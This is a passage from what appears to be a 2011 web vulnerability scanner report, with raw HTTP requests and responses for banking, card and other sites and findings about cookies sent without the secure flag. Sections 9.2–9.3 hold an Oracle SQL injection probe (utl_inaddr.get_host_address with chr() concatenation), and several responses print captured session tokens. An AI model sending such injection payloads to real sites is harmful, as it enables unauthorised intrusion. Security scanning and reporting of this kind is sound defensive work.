Location: https://app.insightgrit.com/Visit37.php?vt=V&id=94375989827&ref=&z=217634&purl=https://www.supermedia.com/spportal/spportalFlow.do%3f_flowExecutionKey=%2527%257C%257C(utl_inaddr.get_host_address((select+chr(95)%257C%257Cchr(33)%257C%257Cchr(64)%257C%257Cchr(51)%257C%257Cchr(100)%257C%257Cchr(105)%257C%257Cchr(108)%257C%257Cchr(101)%257C%257Cchr(109)%257C%257Cchr(109)%257C%257Cchr(97)+from+DUAL)))%257C%257C%2527
Content-Length: 614
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://app.insightgrit.com/Visit37.php?vt=V&am
...[SNIP]...

9.2. https://app.insightgrit.com/Visit37.php  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://app.insightgrit.com
Path:   /Visit37.php

Request

GET /Visit37.php?vt=V&id=94375989827&ref=&z=217634&purl=https://www.supermedia.com/spportal/spportalFlow.do%3f_flowExecutionKey=%2527%257C%257C(utl_inaddr.get_host_address((select+chr(95)%257C%257Cchr(33)%257C%257Cchr(64)%257C%257Cchr(51)%257C%257Cchr(100)%257C%257Cchr(105)%257C%257Cchr(108)%257C%257Cchr(101)%257C%257Cchr(109)%257C%257Cchr(109)%257C%257Cchr(97)+from+DUAL)))%257C%257C%2527 HTTP/1.1
Accept: */*
Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: app.insightgrit.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:59:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 03 Feb 2011 18:59:37 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: PHPSESSID=f7173c41fd6dd0db660d473234eef682; path=/
Set-Cookie: IG94375=f7173c41fd6dd0db660d473234eef682; expires=Mon, 04-Apr-2011 18:59:37 GMT; domain=app.insightgrit.com
p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT"
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

9.3. https://www.supermedia.com/spportal/spportalFlow.do  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.supermedia.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:00:04 GMT
Set-Cookie: JSESSIONID=288FFBAC45FB01B3489845E2C7FB3FFF.app3-a1; Path=/; Secure
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 18:59:58 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 18:59:58 GMT; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a42378b;path=/
Content-Length: 19973


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...

10. SSL cookie without secure flag set  previous  next
There are 166 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


10.1. https://220marketing9-px.rtrk.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://220marketing9-px.rtrk.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: 220marketing9-px.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:08:21 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.6
Set-Cookie: RlocalUID=tc%3D11020308082586054; domain=.rtrk.com; path=/
X-RL-Host: pweb105
X-Robots-Tag: noindex,nofollow
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: PHPSESSID=a1d6aa999b794b82c01268b563cd3d7c;path=/
Vary: Accept-Encoding
Content-Length: 2082
Connection: close


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

...[SNIP]...

10.2. https://app.insightgrit.com/Visit37.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://app.insightgrit.com
Path:   /Visit37.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Visit37.php?vt=V&id=94375989827&ref=&z=217634&purl=https://www.supermedia.com/spportal/spportalFlow.do%3f_flowExecutionKey=%2527%257C%257C(utl_inaddr.get_host_address((select+chr(95)%257C%257Cchr(33)%257C%257Cchr(64)%257C%257Cchr(51)%257C%257Cchr(100)%257C%257Cchr(105)%257C%257Cchr(108)%257C%257Cchr(101)%257C%257Cchr(109)%257C%257Cchr(109)%257C%257Cchr(97)+from+DUAL)))%257C%257C%2527 HTTP/1.1
Accept: */*
Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: app.insightgrit.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:59:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 03 Feb 2011 18:59:37 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: PHPSESSID=f7173c41fd6dd0db660d473234eef682; path=/
Set-Cookie: IG94375=f7173c41fd6dd0db660d473234eef682; expires=Mon, 04-Apr-2011 18:59:37 GMT; domain=app.insightgrit.com
p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT"
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.3. https://cibng.ibanking-services.com/cib/CEBMainServlet/Login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cibng.ibanking-services.com
Path:   /cib/CEBMainServlet/Login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cib/CEBMainServlet/Login?FIORG=330&FIFID=124085066 HTTP/1.1
Host: cibng.ibanking-services.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:44:22 GMT
Server: IBM_HTTP_Server
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-Cache
Set-Cookie: wf=wf
Set-Cookie: sessionId=nullCookie; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 9003


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Personal Savings from American Express : Welcome to Personal Savings from American
...[SNIP]...

10.4. https://icapture.regions.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://icapture.regions.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: icapture.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 15:53:25 GMT
Set-Cookie: ORA_OAAM_UIO_SessionId=FNvbFqGyTdfWYryl2D5XoaYx7Ss=; path=/
Location: https://icapture.regions.com/QuickDeposit/Login.faces?DOMAIN=customerDomain&LOCALE=en_US&SHOWTIPS=true
Cache-Control: no-cache
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_jdbquvsf.sfhjpot.dpn-ngb-wjq=ffffffffaf137d9645525d5f4f58455e445a4a423660;path=/
Set-Cookie: NSC_jdbquvsf.sfhjpot.dpn=ffffffffaf130d0c45525d5f4f58455e445a4a423660;path=/;secure


10.5. https://mappoint-css.live.com/mwssignup/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://mappoint-css.live.com
Path:   /mwssignup/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mwssignup/ HTTP/1.1
Host: mappoint-css.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:06:17 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=ygweoz45fmxyoqio3eycxw55; path=/; HttpOnly
Cache-Control: private
Expires: Thu, 03 Feb 2011 19:06:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 6559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
   
...[SNIP]...

10.6. https://mymortgage.regionsmortgage.com/upmb/disp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://mymortgage.regionsmortgage.com
Path:   /upmb/disp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /upmb/disp HTTP/1.1
Host: mymortgage.regionsmortgage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:51:13 GMT
Pragma: no-cache
Content-Type: text/html
Expires: Tue, 08 Oct 1996 08:00:00 GMT
Set-Cookie: JSESSIONID=78X4NKTR3XNJGSYhhZ2Th2xpf6D1CSTrYyWpz8GbMbm8n2BGT18T!1999683069; path=/
Cache-control: no-cache, no-store
Set-Cookie: NSC_nznpsuhbhf.npsuhbhf-wjq=ffffffffaf130cdc45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:17:21 GMT;path=/
Set-Cookie: rfaft2c2=TIIccZiIP1T3jbTn/4+C2tgIaLwA1; Domain=.regionsmortgage.com; Path=/; HttpOnly
Set-Cookie: rfaft2c2_.regionsmortgage.com_%2F_wlf=TlNDX256bnBzdWhiaGYubnBzdWhiaGYtd2px?D4D4YCjJgK/ADH0JDBFgf3TtVNUA&; Domain=.regionsmortgage.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
Set-Cookie: rfaft2c2_.regionsmortgage.com_%2F_wat=SlNFU1NJT05JRF9f?6SUL/QqXtn1Mtp8iwPpbvOz/oRQA&; Domain=.regionsmortgage.com; Path=/; HttpOnly
X-Expires-Orig: Tue, 08 Oct 1996 08:00:00 GMT
Set-Cookie: NSC_nznpsuhbhf.sfhjpot.dpn=ffffffffaf130d0d45525d5f4f58455e445a4a423660;path=/;secure
Content-Length: 10264


<html>

<head>
<title>Regions Mortgage Login</title>
<script language="javascript" src="/upmb/resource/js/regions/common.jsp"></script>
<script language="javascript" src="/upmb/
...[SNIP]...

10.7. https://online.americanexpress.com/myca/fuidfyp/us/action  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://online.americanexpress.com
Path:   /myca/fuidfyp/us/action

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/fuidfyp/us/action?request_type=un_fuid&Face=en_US&entry_point=lnk_fuid&ReqSource=https%3A%2F%2Fonline.americanexpress.com%2Fmyca%2Facctsumm%2Fus%2Faction%3Frequest_type%3Dauthreg_acctAccountSummary%26us_nu%3Dlogincontrol%26inav%3Dmenu_acct_summary HTTP/1.1
Host: online.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d0f645525d5f4f58455e445a4a42861c; sroute=655231498.58148.0000; SaneID=173.193.214.243-1296742163652146; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1ab45525d5f4f58455e445a4a42be89;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:10:40 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000Jz4mHzg_qVcKbC230bQg2uT:14hqhu881; Path=/
Set-Cookie: MATFSI=IPCFSI::true~BBV::~; Path=/; Domain=.americanexpress.com
Set-Cookie: blueboxvalues=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Domain=.americanexpress.com; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_nf3-x-vt-gvjegzq-c=ffffffff97a3d1c645525d5f4f58455e445a4a4299fa;path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Connection: close
Set-Cookie: sroute=957221386.58404.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 57111


<noscript>
<meta http-equiv="Refresh" CONTENT="0;URL=action?request_type=un_fuid&Face=en_US&JSDisabled=true">
</noscript>



...[SNIP]...

10.8. https://online.americanexpress.com/myca/logon/us/action  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://online.americanexpress.com
Path:   /myca/logon/us/action

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/logon/us/action HTTP/1.1
Host: online.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 13:45:22 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=10.10.14.1-1296740722515782; Path=/; expires=Sun, 07-Feb-16 13:45:22 GMT; domain=.americanexpress.com
Location: https://online.americanexpress.com/myca/logon/us/en/en_US/common/sorry.jsp
Content-Length: 0
Set-Cookie: JSESSIONID=0000-t-4zcMemK8YS5_KVa9xE0B:14fidvuhe; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_nf3-x-vt-mphpo-b=ffffffff97a3d0fb45525d5f4f58455e445a4a42be89;path=/
Content-Type: text/html
Content-Language: en-US
Connection: close
Set-Cookie: sroute=655231498.58148.0000; path=/


10.9. https://online.americanexpress.com/myca/ocareg/us/action  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://online.americanexpress.com
Path:   /myca/ocareg/us/action

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/ocareg/us/action?request_type=un_Register&Face=en_US&DestPage=https%3A%2F%2Fonline.americanexpress.com%2Fmyca%2Facctsumm%2Fus%2Faction%3Frequest_type%3Dauthreg_acctAccountSummary%26us_nu%3Dlogincontrol%26inav%3Dmenu_acct_summary HTTP/1.1
Host: online.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d0f645525d5f4f58455e445a4a42861c; sroute=655231498.58148.0000; SaneID=173.193.214.243-1296742163652146; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1ab45525d5f4f58455e445a4a42be89;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:10:41 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000rmOJEhCd6bj0QqgWui3AFIH:14ia6bumi; Path=/
Set-Cookie: MATFSI=IPCFSI::true~BBV::~; Path=/; Domain=.americanexpress.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_nf3-x-vt-pdbsfhx0-b=ffffffff97a3d1e545525d5f4f58455e445a4a42be8b;path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Connection: close
Set-Cookie: sroute=353241610.58660.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 48074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...

10.10. https://onlineimagelockbox.regions.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://onlineimagelockbox.regions.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: onlineimagelockbox.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:53:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=hhutcomqadtocl45degfdjjf; path=/; secure; HttpOnly
Set-Cookie: .ASPXFORMSAUTH=; expires=Tue, 12-Oct-1999 05:00:00 GMT; path=/; secure; HttpOnly
Set-Cookie: NSC_jnbhfmpdlcpy-qspe-xfc-wjq=ffffffffaf130a1f45525d5f4f58455e445a4a423660;path=/
Set-Cookie: ORA_OAAM_UIO_SessionId=Iz/Bq2jVS/HYC6CeyzqAmxapf3k=; path=/
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Set-Cookie: NSC_psbdmfngb-qspyz=ffffffffaf137d9645525d5f4f58455e445a4a423660;path=/
Set-Cookie: rfaft2c1=k7/bNwhCtq/jAdwA9EyADGvLZSwA1; Domain=.regions.com; Path=/; HttpOnly
Set-Cookie: rfaft2c1_.regions.com_%2F_wlf=LkFTUFhGT1JNU0FVVEhf?yCMmZvm9zj6PjaFzZKKhWqDaQ4sA&; Domain=.regions.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
Set-Cookie: rfaft2c1_.regions.com_%2F_wat=QVNQLk5FVF9TZXNzaW9uSWRf?oIofAIgflLxYTL4OwWcIM/MyLncA&TlNDX2puYmhmbXBkbGNweS1xc3BlLXhmYy13anFf?sjE4MqP5HNW32wfJGQjmFtX1vvAA&T1JBX09BQU1fVUlPX1Nlc3Npb25JZF9f?LVDw7uKv5Su97EdTD6WCH2VIliwA&TlNDX3BzYmRtZm5nYi1xc3B5el9f?QJsyBIV7ZMLO59vA0S4YEVQke/4A&; Domain=.regions.com; Path=/; HttpOnly
X-Expires-Orig: -1
Set-Cookie: NSC_pomjofjnbhfmpdlcpy.sfhjpot.dpn=ffffffffaf130d4445525d5f4f58455e445a4a423660;path=/;secure
Content-Length: 13435


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
   
...[SNIP]...

10.11. https://profile.microsoft.com/RegSysProfileCenter/default.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://profile.microsoft.com
Path:   /RegSysProfileCenter/default.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RegSysProfileCenter/default.aspx?lcid=1033 HTTP/1.1
Host: profile.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14601
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: MicrosoftSessionCookie=Microsoft.CookieId=b2fffb96-3f8b-4cc5-9810-7702b2449a5d&Microsoft.CreationDate=02/03/2011 19:14:57&Microsoft.LastVisitDate=02/03/2011 19:14:57&Microsoft.NumberOfVisits=1&SessionCookie.Id=07F28F36FB368F1F3BC74EDEA40E8AA5; expires=Thu, 03-Feb-2011 19:44:57 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=02/03/2011 19:14:57&Microsoft.LastVisitDate=02/03/2011 19:14:57&Microsoft.VisitStartDate=02/03/2011 19:14:57&Microsoft.CookieId=d3a09828-6600-4bac-b404-cd316bc27b20&Microsoft.TokenId=de207de2-450e-45b1-80d9-51ca6fce9326&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=CxmtGbDy3PjUfAOb97jtZ0PGuh5XEFCFjQVcMoc3ooY9MEFLf2NpOaGus/E48SetVXxPfqNDJ+7T+/P0w3/i0j/8dzrPaXts0bHBwn74lLP8ZeQGA2d4p/Ujs95DBsIkenuEfBiald4sIZEZViA8/kDiCBNekBupheR/KFATPLa3Y1rf3okUcGuQaLMUeBeUNvPVMYXPJOQJibsQdF3b9UpkK9hGTGjgum3oaBj9jlDKKoPxZh4URa+/Yz6BfMZ5r7EtFcrxP6io+7g5Lu0dTeA4EEYt/84l/C3pGnx69aKKQMT7QvCx5JWMpO3v11zV9KSmHc6uPmWlTQWma0oOQa/NH2NZFPQtxH/HtmRdpU4z91gle0miw8h9M+hA0D7qzqHkihn0Qo8ry1Uq+zL2hebi990yiM6JFzZ7S0thnY0bozrwFcbeQtT7EETceU2TMIMszGaFX+an8REIs6hjbQsNz9NfHZ5Fidw8Cn4MVO/wGnpPbeOGTIdADZ4JOykXYj9ziS6jVX0Lj+hIWW4ztto1vJvw6XFlbkDLqcKvzRk=&Microsoft.MicrosoftId=0566-0726-0554-7301; domain=.microsoft.com; expires=Fri, 03-Feb-2012 19:14:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 19:14:57 GMT


<html dir="LTR" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<title>
Profile Center
</title>
<link type='te
...[SNIP]...

10.12. https://rewards.americanexpress.com/myca/loyalty/us/rewards/mracctmgmt/acctsumm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://rewards.americanexpress.com
Path:   /myca/loyalty/us/rewards/mracctmgmt/acctsumm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/loyalty/us/rewards/mracctmgmt/acctsumm HTTP/1.1
Host: rewards.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:47:34 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=10.10.14.1-1296740854766457; Path=/; expires=Sun, 07-Feb-16 13:47:34 GMT; domain=.americanexpress.com
Pragma: no-cache
Expires: Thu, 03 Feb 2011 13:47:34 GMT
LastModified: Thu, 03 Feb 2011 13:47:34 GMT
Set-Cookie: JSESSIONID=0000WcKVkTP27hcngy59gW5Udt2:14eu0u9ia; Path=/
Cache-Control: no-store, no-cache=set-cookie
Set-Cookie: NSC_nf3-x-sx-bddu-b=ffffffff97a3d15845525d5f4f58455e445a4a42ba91;path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Connection: close
Set-Cookie: sroute=856558090.58148.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 48745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en">
<head>
<title>
American Express - Mem
...[SNIP]...

10.13. https://secure.opinionlab.com/comment20AMX.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /comment20AMX.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /comment20AMX.asp?time1= HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDCQBRBBCR=MFJLFHCBMHKCEOMCNICCPKPP; path=/
Date: Thu, 03 Feb 2011 13:47:40 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

10.14. https://secure.thepaymentwindow.com/epayments/default.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.thepaymentwindow.com
Path:   /epayments/default.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /epayments/default.asp HTTP/1.1
Host: secure.thepaymentwindow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 03 Feb 2011 15:51:15 GMT
X-Powered-By: ASP.NET
Connection: close
Content-Length: 297
Content-Type: text/html
